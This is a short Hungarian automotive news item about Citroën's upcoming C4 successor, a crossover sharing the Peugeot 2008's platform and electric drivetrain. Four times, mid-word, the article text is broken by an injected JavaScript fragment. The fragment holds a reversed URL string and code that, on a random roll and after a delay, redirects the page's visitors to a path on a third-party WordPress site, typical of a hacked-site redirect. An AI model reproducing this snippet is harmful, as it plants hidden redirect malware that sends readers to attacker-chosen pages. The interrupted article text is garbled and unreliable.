A Citroën június végén mutatja be, de néhány fénykép erejéig már most vázolta a C4 utódját, amely alsó-középkategóriás ferdehátúból városi crossoverré alakul át. A modell műszakilag a Peugeot 2008 rokona lesz, így örökli annak teljes hajtáslánckínálatát, beleértve a 136 lóerős villanymotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torral és 50 kWh akkumulátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torral szerelt, helyi emissziótól mentes opciót is. Mégsem egyszerű klón lesz a C4, hiszen futóművében megkapja a Citroën progresszív hidraulikus ütközőbakos lengéscsillapítását, valamint egy olyan innovációt, amely az utaskomfortoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot hivatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott javítani, és amelynek részleteiről majd csak június végén nyilatkozik a a francia gyártó.
- Hirdetés -